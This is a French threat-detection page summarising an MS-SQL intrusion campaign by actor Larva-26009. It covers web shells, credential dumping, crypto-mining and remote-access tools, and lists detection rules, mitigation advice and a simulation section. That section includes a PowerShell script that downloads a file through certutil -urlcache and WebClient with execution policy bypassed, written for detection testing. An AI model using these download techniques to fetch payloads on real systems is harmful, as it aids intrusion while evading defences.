Intrusion sur MS SQL Server utilise GoToHTTP et SoftEther VPN pour un accès à distance
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Un acteur de menace suivi sous le nom de Larva-26009 a ciblé les serveurs MS-SQL pour déployer plusieurs charges utiles de logiciels malveillants, y compris XMRig CoinMiner et SoftEther VPN. L’intrusion a impliqué l’installation de web shells pour la persistance, le vol d’identifiants via le dumping du registre, et l’utilisation de plusieurs utilitaires d’escalade des privilèges. L’attaquant s’est également appuyé sur des chargeurs spécialisés et des fichiers chiffrés pour échapper aux mécanismes de détection de sécurité traditionnels.
Enquête
Le Centre de renseignement sur la sécurité AhnLab (ASEC) a détecté l’intrusion en surveillant l’activité d’attaque ciblant les serveurs MS-SQL. L’enquête a révélé l’utilisation de certutil.exe pour déchiffrer les fichiers de web shell, ainsi qu’une activité en ligne de commande associée au dumping d’identifiants et au mouvement latéral. Les chercheurs ont également documenté plusieurs outils d’escalade de privilèges de type Potato et des chargeurs de shellcode spécialisés, y compris RingQ.
Atténuation
Les administrateurs doivent appliquer des mots de passe forts, complexes et régulièrement renouvelés pour tous les comptes de service de base de données afin de réduire le risque d’attaques par force brute. Les serveurs de base de données doivent être protégés par des pare-feu qui restreignent l’accès public et minimisent la surface d’attaque exposée. Les logiciels de sécurité et les solutions de protection des points d’extrémité doivent également être maintenus à jour pour détecter les signatures de logiciels malveillants connus et les activités malveillantes associées.
Réponse
Si une activité malveillante est détectée, les équipes de sécurité doivent immédiatement isoler les serveurs web MS-SQL et IIS compromis pour prévenir tout mouvement latéral supplémentaire. Les intervenants doivent auditer les comptes utilisateurs nouvellement créés, en particulier ceux utilisant des motifs de dénomination suspects tels que des noms se terminant par $. Une analyse forensique de la mémoire doit également être effectuée pour identifier le shellcode injecté et découvrir les services VPN ou de bureau à distance non autorisés fonctionnant sur les systèmes affectés.
Flux d’Attaque
Détections
Téléchargement ou Téléversement via Powershell (via cmdline)
Afficher
Chaînes Powershell suspectes (via cmdline)
Afficher
Possibilité d’énumération ou de manipulation de compte ou de groupe (via cmdline)
Afficher
Possibilité d’exécution de commande via la procédure stockée étendue SQL xp_cmdshell (via cmdline)
Afficher
Utilisation possible de PING pour retarder l’exécution (via cmdline)
Afficher
Utilisation de Certutil pour le codage de données et les opérations de certificat (via cmdline)
Afficher
LOLBAS Bitsadmin (via cmdline)
Afficher
Possibilité de dumping SAM/SYSTEM/SECURITY (via cmdline)
Afficher
Appel de méthodes .NET suspectes depuis Powershell (via powershell)
Afficher
Abus possible de domaine de développement Cloudflare (via dns)
Afficher
IOC (HashMd5) à détecter : Étude de cas : Attaque ciblée sur un serveur MS-SQL impliquant l’installation de GotoHTTP et SoftEther VPN
Afficher
IOC (SourceIP) à détecter : Étude de cas : Attaque ciblée sur un serveur MS-SQL impliquant l’installation de GotoHTTP et SoftEther VPN
Afficher
IOC (DestinationIP) à détecter : Étude de cas : Attaque ciblée sur un serveur MS-SQL impliquant l’installation de GotoHTTP et SoftEther VPN
Afficher
Détecter l’exécution de script à distance via Certutil et PowerShell [Windows Powershell]
Afficher
Indicateurs d’attaques ciblées sur un serveur MS-SQL [Création de processus Windows]
Afficher
Exécution de simulation
Prérequis : La vérification préliminaire de télémétrie et de base doit être réussie.
Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un diagnostic erroné.
-
Narration et commandes de l’attaque : L’adversaire a obtenu un accès initial et prévoit de télécharger une charge utile secondaire pour établir la persistance. Pour éviter les soupçons, il décide d’utiliser des techniques de « Living-off-the-Land » (LotL). Il tentera deux méthodes : tout d’abord, en utilisant
certutil.exepour télécharger un fichier via le-urlcacheindicateur, et deuxièmement, en utilisant unappel de System.Net.WebClienten PowerShell. Cela imite un attaquant tentant de se fondre dans le trafic administratif légitime tout en téléchargeant des outils. -
Script de test de régression :
# Script de simulation pour la détection de téléchargement via Certutil et PowerShell # Note : Ce script tente de télécharger un fichier texte inoffensif depuis une URL publique. $TargetUrl = "https://raw.githubusercontent.com/socprime/test-payloads/main/test.txt" $LocalPathCertutil = "$env:TEMPcertutil_download.txt" $LocalPathPS = "$env:TEMPps_download.txt" Write-Host "[+] Début de la simulation..." -ForegroundColor Cyan # Méthode 1 : Téléchargement de cache URL Certutil Write-Host "[*] Exécution de la technique de téléchargement Certutil..." -ForegroundColor Yellow Start-Process "certutil.exe" -ArgumentList "-urlcache -split -f $TargetUrl $LocalPathCertutil" -NoNewWindow -Wait # Méthode 2 : Téléchargement WebClient PowerShell Write-Host "[*] Exécution de la technique WebClient PowerShell..." -ForegroundColor Yellow powershell.exe -ExecutionPolicy Bypass -Command "(new-object System.Net.WebClient).DownloadFile('$TargetUrl', '$LocalPathPS')" Write-Host "[+] Commandes de simulation exécutées." -ForegroundColor Green -
Commandes de nettoyage :
# Script de nettoyage Remove-Item -Path "$env:TEMPcertutil_download.txt" -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPps_download.txt" -ErrorAction SilentlyContinue Write-Host "[+] Nettoyage terminé." -ForegroundColor Green